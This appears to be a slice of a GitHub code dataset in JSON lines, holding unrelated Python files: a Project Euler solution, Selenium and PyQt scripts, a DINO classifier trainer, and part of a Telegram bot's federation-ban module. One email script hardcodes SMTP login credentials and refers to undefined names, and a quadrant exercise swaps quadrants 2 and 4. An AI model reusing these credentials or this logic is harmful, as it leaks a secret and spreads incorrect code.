raise_on_error=False, raise_on_exception=False):\n if not ok:\n print(response)\n","repo_name":"vivianzzhu91/dsci551_project","sub_path":"api/covid2elastic.py","file_name":"covid2elastic.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"36294703886","text":"#!/usr/bin/env python3\n\"\"\"Project Euler #22 - Names scores (24/11/2020)\"\"\"\n\ndef get_input():\n with open(\"resources/p022_names.txt\", \"r\") as file:\n return file.read().replace('\"', '').split(',')\n\ndef solve(names):\n names.sort()\n\n total_score = 0\n for i, name in enumerate(names):\n total_score += (i + 1) * sum(ord(letter) - ord('A') + 1 for letter in name)\n\n return total_score\n\nif __name__ == \"__main__\":\n print(solve(get_input()))\n","repo_name":"histefanhere/euler","sub_path":"problems/p022.py","file_name":"p022.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"6225464195","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 03 11:48:29 2018\n\n\"\"\"\n\nfrom PIL import Image\n\nimport os\n\n# Open a file\n# change path name according to your source path\n# The directory should contain bunch of images that you want to test\npath = \"C:/Users/Kartik/Desktop/Green\" \ndirs = os.listdir( path )\n#list1 = []\n# This would print all the files and directories\nfor file in dirs:\n if file.endswith(\".jpg\"):\n img = Image.open(str(file))\n print (file)\n pixels = img.getdata()\n count = 0\n total = 0\n for r,g,b in pixels:\n total += 1\n if r <= 255 and r > 190 and g <= 255 and g > 190 and b>0 and b<204:\n count += 1\n perc = round(count/total*100,2)\n print (str(perc)+\"%\")\n","repo_name":"kgupta31/Pest-Kill-system--Tuta-Absoluta","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"40727573584","text":"import math\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nimport time\nimport os\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\n\n\ntry:\n link = \"http://suninjuly.github.io/explicit_wait2.html\"\n browser = webdriver.Chrome()\n browser.get(link)\n\n price = WebDriverWait(browser, 12).until(\n ec.text_to_be_present_in_element((By.CSS_SELECTOR, \"h5#price\"), \"$100\")\n )\n\n book = browser.find_element(By.CSS_SELECTOR, \"button#book\")\n book.click()\n\n number = browser.find_element(By.CSS_SELECTOR, \"span#input_value\")\n number_value = int(number.text)\n\n result = math.log(abs(12*math.sin(number_value)))\n\n input_answer = browser.find_element(By.CSS_SELECTOR, \"input#answer\")\n input_answer.send_keys(result)\n\n submit = browser.find_element(By.CSS_SELECTOR, \"button[type='submit']\")\n submit.click()\nfinally:\n # ожидание чтобы визуально оценить результаты прохождения скрипта\n time.sleep(10)\n # закрываем брау��ер после всех манипуляций\n browser.quit()\n","repo_name":"rzakhar/selenium_course","sub_path":"part2/lesson4_step8.py","file_name":"lesson4_step8.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"18961543628","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis module implements a renderer that renders another renderer but rotated.\n\"\"\"\nfrom __future__ import division\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom builtins import range\n\nfrom asciimatics.renderers.base import StaticRenderer\n\n\nclass RotatedDuplicate(StaticRenderer):\n \"\"\"\n Chained renderer to add a rotated version of the original renderer underneath and centre the\n whole thing within within the specified dimensions.\n \"\"\"\n\n def __init__(self, width, height, renderer):\n \"\"\"\n :param width: The maximum width of the rendered text.\n :param height: The maximum height of the rendered text.\n :param renderer: The renderer to wrap.\n \"\"\"\n super(RotatedDuplicate, self).__init__()\n for image in renderer.images:\n mx = (width - max([len(x) for x in image])) // 2\n my = height // 2 - len(image)\n tab = (\" \" * mx if mx > 0 else \"\") + \"\\n\" + (\" \" * mx if mx > 0 else \"\")\n new_image = []\n new_image.extend([\"\" for _ in range(max(0, my))])\n new_image.extend(image)\n new_image.extend([x[::-1] for x in reversed(image)])\n new_image.extend([\"\" for _ in range(max(0, my))])\n if mx < 0:\n new_image = [x[-mx:mx] for x in new_image]\n if my < 0:\n new_image = new_image[-my:my]\n self._images.append(tab.join(new_image))\n","repo_name":"peterbrittain/asciimatics","sub_path":"asciimatics/renderers/rotatedduplicate.py","file_name":"rotatedduplicate.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":3428,"dataset":"github-code","pt":"95"} +{"seq_id":"3927711976","text":"'''Напишите программу, которая принимает на вход координаты точки (X и Y), причём X ≠ 0 и Y ≠ 0 \nи выдаёт номер четверти плоскости, в которой находится эта точка.\n\nПример:\n\n- x=34; y=-30 -> 4\n- x=2; y=4-> 1\n- x=-34; y=-30 -> 3'''\n\nx = int(input('x = '))\ny = int(input('y = '))\n\nif x == 0 or y == 0:\n print('Значения не должны равняться 0')\nelse:\n if x > 0:\n if y > 0:\n print(\"1 четверть\")\n else:\n print(\"2 четверть\")\n else:\n if y < 0:\n print(\"3 четверть\")\n else:\n print(\"4 четверть\")\n","repo_name":"Cos125RUS/Python-Homework","sub_path":"Homework01/Task03.py","file_name":"Task03.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"34933754850","text":"number_of_pieces = int(input())\npieces = {}\n\nfor nums in range(number_of_pieces):\n songs = input().split('|')\n key = songs[0]\n value = [songs[1], songs[2]]\n pieces[key] = value\ncommand = input()\nwhile not command == 'Stop':\n command = command.split('|')\n act = command[0]\n piece = command[1]\n if act == 'Add':\n composer = command[2]\n note = command[3]\n if piece in pieces:\n print(f'{piece} is already in the collection!')\n else:\n pieces[piece] = [composer, note]\n print(f\"{piece} by {composer} in {note} added to the collection!\")\n\n elif act == 'Remove':\n if piece in pieces:\n removed = pieces.pop(piece)\n print(f'Successfully removed {piece}!')\n else:\n print(f'Invalid operation! {piece} does not exist in the collection.')\n\n elif act == 'ChangeKey':\n new_key = command[2]\n if piece in pieces:\n pieces[piece][1] = new_key\n print(f'Changed the key of {piece} to {new_key}!')\n else:\n print(f'Invalid operation! {piece} does not exist in the collection.')\n\n command = input()\n\nsorted_by_name = dict(sorted(pieces.items(), key=lambda x: (x[0], x[0])))\nfor el, digit in sorted_by_name.items():\n print(f'{el} -> Composer: {digit[0]}, Key: {digit[1]}')","repo_name":"vmakksimov/PythonFundamentals","sub_path":"finalexam/3.The_pianist.py","file_name":"3.The_pianist.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"16038716069","text":"#!/usr/bin/env python3\n\nclass TroughObject():\n def __init__(self, identifier, *args, **options):\n self.identifier = identifier\n self.meta = options.get('meta')\n self.desciption = options.get('description')\n self.data = options.get('data')\n self.parent = options.get('parent')\n\n self.parent.entries.append(self)\n","repo_name":"aaiknn/beth","sub_path":"utils/trough/TroughObject.py","file_name":"TroughObject.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"74616683195","text":"import smtplib\nclass enviarMensagens:\n\n def __init__(self):\n message = MIMEText(\"TEST!\")\n message[\"Subject\"] = \"Alert!\"\n message[\"From\"] = sender\n message[\"To\"] = receiver\n def enviar_email(self, email, titulo):\n self.email = email\n self.titulo = titulo\n\n sender = \"Private Person \"\n receiver = \"A Test User \"\n\n\n message = self.mensagem\n\n print(message)\n with smtplib.SMTP(\"smtp.mailtrap.io\", 2525) as server:\n server.login(\"e98bc320925dae\", \"eecc4df1afb91f\")\n server.sendmail(sender, receiver, message.as_string())\n\n\n envio_email = enviarMensagens('Erro')\n envio_email.enviar_email(\"A Test User \", \"titulo da mensagem\")\n","repo_name":"AAliSilva/project_python_inicial","sub_path":"script_envioMsg.py","file_name":"script_envioMsg.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"2419003872","text":"from PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(947, 593)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.horizontalLayout = QtWidgets.QHBoxLayout()\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.map_mode = QtWidgets.QComboBox(self.centralwidget)\n font = QtGui.QFont()\n font.setPointSize(14)\n self.map_mode.setFont(font)\n self.map_mode.setFocusPolicy(QtCore.Qt.NoFocus)\n self.map_mode.setObjectName(\"map_mode\")\n self.map_mode.addItem(\"\")\n self.map_mode.addItem(\"\")\n self.map_mode.addItem(\"\")\n self.horizontalLayout.addWidget(self.map_mode)\n self.reset = QtWidgets.QPushButton(self.centralwidget)\n font = QtGui.QFont()\n font.setPointSize(14)\n self.reset.setFont(font)\n self.reset.setFocusPolicy(QtCore.Qt.NoFocus)\n self.reset.setObjectName(\"reset\")\n self.horizontalLayout.addWidget(self.reset)\n self.search_line = QtWidgets.QLineEdit(self.centralwidget)\n self.search_line.setFont(font)\n self.search_line.setFocusPolicy(QtCore.Qt.ClickFocus)\n self.search_line.setObjectName(\"search_line\")\n self.horizontalLayout.addWidget(self.search_line)\n self.search_button = QtWidgets.QPushButton(self.centralwidget)\n self.search_button.setFont(font)\n self.search_button.setFocusPolicy(QtCore.Qt.NoFocus)\n self.search_button.setObjectName(\"search_button\")\n self.horizontalLayout.addWidget(self.search_button)\n self.verticalLayout.addLayout(self.horizontalLayout)\n self.map_label = QtWidgets.QLabel(self.centralwidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.map_label.sizePolicy().hasHeightForWidth())\n self.map_label.setSizePolicy(sizePolicy)\n self.map_label.setText(\"\")\n self.map_label.setObjectName(\"map_label\")\n self.verticalLayout.addWidget(self.map_label)\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\n self.address = QtWidgets.QLabel(self.centralwidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.address.sizePolicy().hasHeightForWidth())\n self.address.setSizePolicy(sizePolicy)\n self.address.setObjectName(\"address\")\n self.horizontalLayout_2.addWidget(self.address)\n self.pochta_index = QtWidgets.QCheckBox(self.centralwidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.pochta_index.sizePolicy().hasHeightForWidth())\n self.pochta_index.setSizePolicy(sizePolicy)\n self.pochta_index.setObjectName(\"pochta_index\")\n self.horizontalLayout_2.addWidget(self.pochta_index)\n self.verticalLayout.addLayout(self.horizontalLayout_2)\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 947, 21))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n self.address.setFont(font)\n self.pochta_index.setFont(font)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"map\"))\n self.map_mode.setItemText(0, _translate(\"MainWindow\", \"Схема\"))\n self.map_mode.setItemText(1, _translate(\"MainWindow\", \"Гибрид\"))\n self.map_mode.setItemText(2, _translate(\"MainWindow\", \"Спутник\"))\n self.reset.setText(_translate(\"MainWindow\", \"Сброс поискового результата\"))\n self.search_button.setText(_translate(\"MainWindow\", \"Найти\"))\n self.map_label.setText(_translate(\"MainWindow\", \"\"))\n self.pochta_index.setText(_translate(\"MainWindow\", \"Индекс\"))\n","repo_name":"MariaSalimova/YandeMapAPITask","sub_path":"window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":4945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"39005529836","text":"import functools\nimport logging\nimport math\nimport os\nfrom datetime import datetime\n\nimport Abed_utils\n\nimport torch\nimport torch.nn as nn\nfrom torchvision.datasets import ImageFolder\nfrom torch.utils.data import random_split, DataLoader, TensorDataset\nfrom tqdm import trange\n\nif __name__ == '__main__':\n\n patch_size = 8\n lr = 1e-3\n epochs = 100\n batch_size = 64\n dropout = 0.5\n hidden_dims = [100, 100, 100]\n\n os.makedirs('./logs/', exist_ok=True)\n\n logfile = f'./logs/trained65{\"_\".join([str(x) for x in hidden_dims]) if hidden_dims else \"_no\"}_hidden_{\"nodropout\" if dropout is None else f\"{dropout}dropout\"}.txt'\n # logfile = f'./logs/tuned_no_hidden.txt'\n weights_file = f'classifier_K19_CE_{epochs}ep_trained65{\"_\".join([str(x) for x in hidden_dims]) if hidden_dims else \"_no\"}_hidden_{\"nodropout\" if dropout is None else f\"{dropout}dropout\"}.pt'\n\n outpath = os.path.join(Abed_utils.OUTPUT_ROOT, 'classifier_weights')\n os.makedirs(outpath, exist_ok=True)\n os.makedirs(os.path.join(Abed_utils.OUTPUT_ROOT, 'classifier_hist'), exist_ok=True)\n\n logging.basicConfig(filename=logfile,\n filemode='a',\n datefmt=Abed_utils.DATETIME_FORMAT,\n level=logging.DEBUG)\n logger = logging.getLogger('Training')\n\n\n device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n logger.debug(f'using {device}')\n\n # backbone = Abed_utils.get_model(patch_size, './ckpts/dino_deitsmall8_pretrain.pth').to(device)\n\n # t = functools.partial(Abed_utils.normalize_input, im_size=224, patch_size=patch_size)\n # ds = ImageFolder(Abed_utils.DATA_ROOT, transform=t, loader=Abed_utils.load_tif_windows)\n features, labels = Abed_utils.load_features(os.path.join(Abed_utils.OUTPUT_ROOT, 'features-k19-trained-65'), device=device)\n\n # Augment with flipped images\n # features_flipped, labels_flipped = Abed_utils.load_features(os.path.join(Abed_utils.OUTPUT_ROOT, 'features_flipped'), cuda=True)\n # features = torch.concat([features, features_flipped], 0)\n # labels = torch.concat([labels, labels_flipped])\n # epochs = epochs//2\n\n train_idx, test_idx = random_split(range(labels.shape[0]),\n [9*labels.shape[0]//10, labels.shape[0] - 9*labels.shape[0]//10])\n\n X_train, y_train = features[train_idx,:], labels[train_idx]\n X_test, y_test = features[test_idx,:], labels[test_idx]\n\n train_loader = DataLoader(TensorDataset(X_train, y_train), batch_size=batch_size, shuffle=True)\n test_loader = DataLoader(TensorDataset(X_test, y_test), batch_size=batch_size, shuffle=True)\n\n model = Abed_utils.ClassificationHead(in_dim=192, dropout=dropout, hidden_dims=hidden_dims)\n\n optimizer = torch.optim.Adam(model.parameters(), lr)\n criterion = nn.CrossEntropyLoss()\n\n train_loss_hist = []\n train_acc_hist = []\n test_loss_hist = []\n test_acc_hist = []\n for epoch in trange(epochs, desc='Training classifier...'):\n train_loss = 0\n train_correct = 0\n test_loss = 0\n test_correct = 0\n model.train()\n for x, y in train_loader:\n optimizer.zero_grad()\n preds = model(x.to(device))\n loss = criterion(preds, y.to(device))\n loss.backward()\n\n with torch.no_grad():\n train_correct += torch.argmax(preds, dim=1).eq(y).byte().sum().item()\n train_loss += loss.item()\n optimizer.step()\n\n with torch.no_grad():\n model.eval()\n for x_t, y_t in test_loader:\n preds = model(x_t.to(device))\n loss = criterion(preds, y_t.to(device))\n test_correct += torch.argmax(preds, dim=1).eq(y_t).byte().sum().item()\n test_loss += loss.item()\n\n train_loss /= len(train_loader)\n train_acc = train_correct / len(train_loader.dataset)\n test_loss /= len(test_loader)\n test_acc = test_correct / len(test_loader.dataset)\n\n train_loss_hist.append(train_loss)\n train_acc_hist.append(train_acc)\n test_loss_hist.append(test_loss)\n test_acc_hist.append(test_acc)\n\n logger.info(f'epoch {epoch+1}, train_loss:{train_loss}, train_acc:{train_acc}, val_loss:{test_loss}, val_acc:{test_acc} ')\n\n # torch.save(model.state_dict(), os.path.join(Abed_utils.OUTPUT_ROOT, 'classifier_weights', f'ckpt{epoch}.pt'))\n\n data = {'train_loss': train_loss_hist,\n 'train_acc': train_acc_hist,\n 'test_loss': test_loss_hist,\n 'test_acc': test_acc_hist}\n\n weights_file = os.path.join(os.getcwd(), 'ckpts', weights_file)\n logger.info(f'Saving to {weights_file}')\n torch.save(data, os.path.join(Abed_utils.OUTPUT_ROOT, 'classifier_hist', os.path.basename(logfile).split('.')[0]+'.pt'))\n torch.save(model.state_dict(), weights_file)","repo_name":"aalshabaan/self-supervised-pathology","sub_path":"train_mlp.py","file_name":"train_mlp.py","file_ext":"py","file_size_in_byte":4909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"37738975613","text":"import csv\nimport json\nimport os\nimport re\nimport time\nimport uuid\nfrom io import BytesIO\nfrom typing import Optional\n\nfrom telegram import Chat\nfrom telegram import ChatAction\nfrom telegram import InlineKeyboardButton\nfrom telegram import InlineKeyboardMarkup\nfrom telegram import MessageEntity\nfrom telegram import ParseMode\nfrom telegram import User\nfrom telegram.error import BadRequest\nfrom telegram.error import TelegramError\nfrom telegram.error import Unauthorized\nfrom telegram.ext import CallbackQueryHandler\nfrom telegram.ext import CommandHandler\nfrom telegram.ext import run_async\nfrom telegram.utils.helpers import mention_html\nfrom telegram.utils.helpers import mention_markdown\n\nimport julia.modules.sql.feds_sql as sql\nfrom julia import dispatcher\nfrom julia import LOGGER\nfrom julia import MESSAGE_DUMP\nfrom julia import OWNER_ID\nfrom julia.modules.helper_funcs.alternate import send_action\nfrom julia.modules.helper_funcs.alternate import send_message\nfrom julia.modules.helper_funcs.chat_status import is_user_admin\nfrom julia.modules.helper_funcs.extraction import extract_unt_fedban\nfrom julia.modules.helper_funcs.extraction import extract_user\nfrom julia.modules.helper_funcs.extraction import extract_user_fban\nfrom julia.modules.helper_funcs.string_handling import markdown_parser\n\n# Hello bot owner, I spended for feds many hours of my life, Please don't remove this if you still respect MrYacha and peaktogoo and AyraHikari too\n# Federation by MrYacha 2018-2019\n# Federation rework by Mizukito Akito 2019\n# Federation update v2 by Ayra Hikari 2019\n#\n# Time spended on feds = 10h by #MrYacha\n# Time spended on reworking on the whole feds = 22+ hours by @peaktogoo\n# Time spended on updating version to v2 = 26+ hours by @AyraHikari\n#\n# Total spended for making this features is 68+ hours\n\n# LOGGER.info(\"Original federation module by MrYacha, reworked by Mizukito Akito (@peaktogoo) on Telegram.\")\n\n# TODO: Fix Loads of code duplication\n\nFBAN_ERRORS = {\n \"User is an administrator of the chat\",\n \"Chat not found\",\n \"Not enough rights to restrict/unrestrict chat member\",\n \"User_not_participant\",\n \"Peer_id_invalid\",\n \"Group chat was deactivated\",\n \"Need to be inviter of a user to kick it from a basic group\",\n \"Chat_admin_required\",\n \"Only the creator of a basic group can kick group administrators\",\n \"Channel_private\",\n \"Not in the chat\",\n \"Have no rights to send a message\",\n}\n\nUNFBAN_ERRORS = {\n \"User is an administrator of the chat\",\n \"Chat not found\",\n \"Not enough rights to restrict/unrestrict chat member\",\n \"User_not_participant\",\n \"Method is available for supergroup and channel chats only\",\n \"Not in the chat\",\n \"Channel_private\",\n \"Chat_admin_required\",\n \"Have no rights to send a message\",\n}\n\n\n@run_async\ndef new_fed(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n message = update.effective_message\n if chat.type != \"private\":\n update.effective_message.reply_text(\n \"You can your federation in my PM, not in a group.\")\n return\n fednam = message.text.split(None, 1)\n if len(fednam) >= 2:\n fednam = fednam[1]\n fed_id = str(uuid.uuid4())\n fed_name = fednam\n LOGGER.info(fed_id)\n\n # Currently only for creator\n # if fednam == 'Team Nusantara Disciplinary Circle':\n # fed_id = \"TeamNusantaraDevs\"\n\n x = sql.new_fed(user.id, fed_name, fed_id)\n if not x:\n update.effective_message.reply_text(\n \"Can't federate! Please contact my owner @starryboi if the problem persists.\"\n )\n return\n\n update.effective_message.reply_text(\n \"*You have successfully created a new federation!*\"\n \"\\nName: `{}`\"\n \"\\nID: `{}`\"\n \"\\n\\nUse the command below to join the federation:\"\n \"\\n`/joinfed {}`\".format(fed_name, fed_id, fed_id),\n parse_mode=ParseMode.MARKDOWN,\n )\n try:\n context.bot.send_message(\n MESSAGE_DUMP,\n \"Federation {} has been created with ID:
{}
\".\n format(fed_name, fed_id),\n parse_mode=ParseMode.HTML,\n )\n except Exception:\n LOGGER.warning(\"Cannot send a message to MESSAGE_DUMP\")\n else:\n update.effective_message.reply_text(\n \"Please write down the name of the federation\")\n\n\n@run_async\ndef del_fed(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n args = context.args\n if chat.type != \"private\":\n update.effective_message.reply_text(\n \"You can delete your federation in my PM, not in the group.\")\n return\n if args:\n is_fed_id = args[0]\n getinfo = sql.get_fed_info(is_fed_id)\n if getinfo is False:\n update.effective_message.reply_text(\"This federation is not found\")\n return\n if int(getinfo[\"owner\"]) == int(user.id) or int(user.id) == OWNER_ID:\n fed_id = is_fed_id\n else:\n update.effective_message.reply_text(\n \"Only federation owners can do this!\")\n return\n else:\n update.effective_message.reply_text(\"What should I delete?\")\n return\n\n if is_user_fed_owner(fed_id, user.id) is False:\n update.effective_message.reply_text(\n \"Only federation owners can do this!\")\n return\n\n update.effective_message.reply_text(\n \"Are you sure you want to delete your federation? This action cannot be canceled, you will lose your entire ban list, and '{}' will be permanently lost.\"\n .format(getinfo[\"fname\"]),\n reply_markup=InlineKeyboardMarkup([\n [\n InlineKeyboardButton(\n text=\"⚠️ Remove Federation ⚠️\",\n callback_data=\"rmfed_{}\".format(fed_id),\n )\n ],\n [\n InlineKeyboardButton(text=\"Cancel\",\n callback_data=\"rmfed_cancel\")\n ],\n ]),\n )\n\n\n@run_async\ndef fed_chat(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n fed_id = sql.get_fed_id(chat.id)\n\n user_id = update.effective_message.from_user.id\n if not is_user_admin(update.effective_chat, user_id):\n update.effective_message.reply_text(\n \"You must be an admin to execute this command\")\n return\n\n if not fed_id:\n update.effective_message.reply_text(\n \"This group is not in any federation!\")\n return\n\n chat = update.effective_chat # type: Optional[Chat]\n info = sql.get_fed_info(fed_id)\n\n text = \"This chat is part of the following federation:\"\n text += \"\\n{} (ID: {})\".format(info[\"fname\"], fed_id)\n\n update.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n\n\n@run_async\ndef join_fed(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM!\",\n )\n return\n\n message = update.effective_message\n administrators = chat.get_administrators()\n fed_id = sql.get_fed_id(chat.id)\n args = context.args\n\n if str(user.id) in str(OWNER_ID):\n pass\n else:\n for admin in administrators:\n status = admin.status\n if status == \"creator\":\n if str(admin.user.id) == str(user.id):\n pass\n else:\n update.effective_message.reply_text(\n \"Only group creators can use this command!\")\n return\n if fed_id:\n message.reply_text(\"You cannot join two federations from one chat\")\n return\n\n if len(args) >= 1:\n getfed = sql.search_fed_by_id(args[0])\n if getfed is False:\n message.reply_text(\"Please enter a valid federation ID\")\n return\n\n x = sql.chat_join_fed(args[0], chat.title, chat.id)\n if not x:\n message.reply_text(\"Failed to join federation!\")\n return\n\n get_fedlog = sql.get_fed_log(args[0])\n if get_fedlog:\n if eval(get_fedlog):\n context.bot.send_message(\n get_fedlog,\n \"Chat *{}* has joined the federation *{}*\".format(\n chat.title, getfed[\"fname\"]),\n parse_mode=\"markdown\",\n )\n\n message.reply_text(\"This chat has joined the federation: {}!\".format(\n getfed[\"fname\"]))\n\n\n@run_async\ndef leave_fed(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n fed_info = sql.get_fed_info(fed_id)\n\n # administrators = chat.get_administrators().status\n getuser = context.bot.get_chat_member(chat.id, user.id).status\n if getuser in \"creator\" or str(user.id) in str(OWNER_ID):\n if sql.chat_leave_fed(chat.id) is True:\n get_fedlog = sql.get_fed_log(fed_id)\n if get_fedlog:\n if eval(get_fedlog):\n context.bot.send_message(\n get_fedlog,\n \"Chat *{}* has left the federation *{}*\".format(\n chat.title, fed_info[\"fname\"]),\n parse_mode=\"markdown\",\n )\n send_message(\n update.effective_message,\n \"This chat has left the federation {}!\".format(\n fed_info[\"fname\"]),\n )\n else:\n update.effective_message.reply_text(\n \"How can you leave a federation that you never joined?!\")\n else:\n update.effective_message.reply_text(\n \"Only group creators can use this command!\")\n\n\n@run_async\ndef user_join_fed(update, context):\n chat = update.effective_chat\n user = update.effective_user\n msg = update.effective_message\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n\n if is_user_fed_owner(fed_id, user.id) or str(user.id) in str(OWNER_ID):\n user_id = extract_user(msg, args)\n if user_id:\n user = context.bot.get_chat(user_id)\n elif not msg.reply_to_message and not args:\n user = msg.from_user\n elif not msg.reply_to_message and (\n not args or\n (len(args) >= 1 and not args[0].startswith(\"@\")\n and not args[0].isdigit()\n and not msg.parse_entities([MessageEntity.TEXT_MENTION]))):\n msg.reply_text(\"I cannot extract user from this message\")\n return\n else:\n LOGGER.warning(\"error\")\n getuser = sql.search_user_in_fed(fed_id, user_id)\n fed_id = sql.get_fed_id(chat.id)\n info = sql.get_fed_info(fed_id)\n get_owner = eval(info[\"fusers\"])[\"owner\"]\n get_owner = context.bot.get_chat(get_owner).id\n if user_id == get_owner:\n update.effective_message.reply_text(\n \"You do know that the user is the federation owner, right? RIGHT?\"\n )\n return\n if getuser:\n update.effective_message.reply_text(\n \"I cannot promote users who are already federation admins! But, I can remove them if you want!\"\n )\n return\n if user_id == context.bot.id:\n update.effective_message.reply_text(\n \"I already am a federation admin in all federations!\")\n return\n res = sql.user_join_fed(fed_id, user_id)\n if res:\n update.effective_message.reply_text(\"Successfully Promoted!\")\n else:\n update.effective_message.reply_text(\"Failed to promote!\")\n else:\n update.effective_message.reply_text(\n \"Only federation owners can do this!\")\n\n\n@run_async\ndef user_demote_fed(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n\n if is_user_fed_owner(fed_id, user.id):\n msg = update.effective_message # type: Optional[Message]\n user_id = extract_user(msg, args)\n if user_id:\n user = context.bot.get_chat(user_id)\n\n elif not msg.reply_to_message and not args:\n user = msg.from_user\n\n elif not msg.reply_to_message and (\n not args or\n (len(args) >= 1 and not args[0].startswith(\"@\")\n and not args[0].isdigit()\n and not msg.parse_entities([MessageEntity.TEXT_MENTION]))):\n msg.reply_text(\"I cannot extract user from this message\")\n return\n else:\n LOGGER.warning(\"error\")\n\n if user_id == context.bot.id:\n update.effective_message.reply_text(\n \"The thing you are trying to demote me from will fail to work without me! Just saying.\"\n )\n return\n\n if sql.search_user_in_fed(fed_id, user_id) is False:\n update.effective_message.reply_text(\n \"I cannot demote people who are not federation admins!\")\n return\n\n res = sql.user_demote_fed(fed_id, user_id)\n if res is True:\n update.effective_message.reply_text(\"Get out of here!\")\n else:\n update.effective_message.reply_text(\"Demotion failed!\")\n else:\n update.effective_message.reply_text(\n \"Only federation owners can do this!\")\n return\n\n\n@run_async\ndef fed_info(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n args = context.args\n if args:\n fed_id = args[0]\n info = sql.get_fed_info(fed_id)\n else:\n fed_id = sql.get_fed_id(chat.id)\n if not fed_id:\n send_message(update.effective_message,\n \"This group is not in any federation!\")\n return\n info = sql.get_fed_info(fed_id)\n\n if is_user_fed_admin(fed_id, user.id) is False:\n update.effective_message.reply_text(\n \"Only a federation admin can do this!\")\n return\n\n owner = context.bot.get_chat(info[\"owner\"])\n try:\n owner_name = owner.first_name + \" \" + owner.last_name\n except BaseException:\n owner_name = owner.first_name\n FEDADMIN = sql.all_fed_users(fed_id)\n FEDADMIN.append(int(owner.id))\n TotalAdminFed = len(FEDADMIN)\n\n user = update.effective_user # type: Optional[Chat]\n chat = update.effective_chat # type: Optional[Chat]\n info = sql.get_fed_info(fed_id)\n\n text = 